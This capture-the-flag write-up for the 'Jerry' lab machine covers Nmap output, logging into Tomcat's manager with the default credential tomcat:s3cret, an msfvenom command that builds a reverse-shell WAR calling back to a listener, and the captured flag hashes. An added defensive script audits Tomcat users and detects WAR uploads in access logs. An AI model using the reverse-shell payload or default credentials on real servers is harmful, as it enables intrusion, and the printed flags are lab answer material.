This article details the penetration testing process for a target machine named "Jerry". Scanning the target IP with Nmap showed that port 8080 was open and running Apache Tomcat. Logging into the application manager with the default credentials "tomcat:s3cret" allowed a WAR file to be uploaded, which yielded a shell. Finally, on the Windows system, the user and root flags (user.txt and root.txt, each containing its hash) were obtained.

Information Gathering

# Nmap 7.98 scan initiated Sat Dec 27 06:19:34 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (97%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.008 days (since Sat Dec 27 06:09:14 2025)
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 06:20:16 2025 -- 1 IP address (1 host up) scanned in 41.97 seconds

Log in to the application manager with the default credentials tomcat:s3cret

Uploading a WAR file is enough to obtain a shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f war -o shell.war
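The two weaknesses chained above (a manager account with default credentials, then a WAR deployed through the manager) are both visible to a defender. The following script is an added example, not part of the original writeup: it audits a tomcat-users.xml for default or short passwords on accounts holding manager roles, and scans Tomcat access-log lines (the default AccessLogValve pattern `%h %l %u %t "%r" %s %b`) for successful uploads or deployments through the manager. The default-credential list, the sample tomcat-users.xml and the sample log lines are constructed for this example; only tomcat:s3cret comes from the writeup.

```python
"""Defensive checks for the Tomcat manager weakness seen on Jerry:
1) audit_tomcat_users(): default / weak credentials on manager-role accounts,
2) detect_manager_deploys(): WAR uploads or deploys via the manager in access logs.
All sample data in this file is constructed for the example."""
import re
import xml.etree.ElementTree as ET

# Credential pairs commonly found in Tomcat examples or left in place after
# install. tomcat:s3cret is the one used on Jerry; the rest are an
# illustrative (not exhaustive) list of documented defaults.
DEFAULT_CREDS = {
    ("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin"),
    ("admin", ""), ("tomcat", ""), ("role1", "tomcat"), ("both", "tomcat"),
}
# Roles that grant access to the manager / host-manager applications.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12  # assumption: local policy threshold for this example

# Constructed tomcat-users.xml resembling the vulnerable configuration.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xk9#v2Lq!pR7" roles="manager-script"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return (username, finding) tuples for manager-role accounts whose
    password is a known default or shorter than MIN_PASSWORD_LEN."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        # Tomcat 7 files have no namespace, Tomcat 8+ do; match on the tag suffix.
        if not el.tag.endswith("user"):
            continue
        user = el.get("username", "")
        pwd = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        priv = roles & MANAGER_ROLES
        if not priv:
            continue  # unprivileged accounts are out of scope for this check
        if (user, pwd) in DEFAULT_CREDS:
            findings.append((user, "default credential with manager role: "
                             + ",".join(sorted(priv))))
        elif len(pwd) < MIN_PASSWORD_LEN:
            findings.append((user, "short password (<%d chars) with manager role"
                             % MIN_PASSWORD_LEN))
    return findings


# Default Tomcat access log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Constructed log excerpt: failed anonymous hit, authenticated login, WAR
# upload through the HTML manager, first request to the new context, and a
# benign request from another client.
SAMPLE_ACCESS_LOG = """10.10.16.3 - - [27/Dec/2025:06:21:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.3 - tomcat [27/Dec/2025:06:21:09 +0000] "GET /manager/html HTTP/1.1" 200 11542
10.10.16.3 - tomcat [27/Dec/2025:06:21:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 12011
10.10.16.3 - - [27/Dec/2025:06:21:44 +0000] "GET /shell/ HTTP/1.1" 200 -
10.10.10.50 - - [27/Dec/2025:06:25:00 +0000] "GET /docs/index.html HTTP/1.1" 200 5512
"""


def detect_manager_deploys(log_text):
    """Return (client, user, description) for successful application
    deployments made through the manager HTML UI or its text API."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["status"] != "200":
            continue  # unparsable or unsuccessful requests are ignored
        path = m["path"].split("?", 1)[0]  # drop the CSRF nonce / query string
        if m["method"] == "POST" and path == "/manager/html/upload":
            alerts.append((m["host"], m["user"], "WAR uploaded via manager HTML UI"))
        elif m["method"] == "PUT" and path.startswith("/manager/text/deploy"):
            alerts.append((m["host"], m["user"], "WAR deployed via manager text API"))
    return alerts


if __name__ == "__main__":
    for user, why in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print("tomcat-users.xml:", user, "-", why)
    for host, user, why in detect_manager_deploys(SAMPLE_ACCESS_LOG):
        print("access log:", host, "as", user, "-", why)
```

Run against the constructed inputs, the audit flags the tomcat account and the log check flags the upload from 10.10.16.3 as user tomcat. Point the two functions at a real `conf/tomcat-users.xml` and `logs/localhost_access_log.*.txt` to use them beyond the sample data; deployments via the text API only appear if the manager-script role is in use, which is why both paths are checked.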

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,418,716,672 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e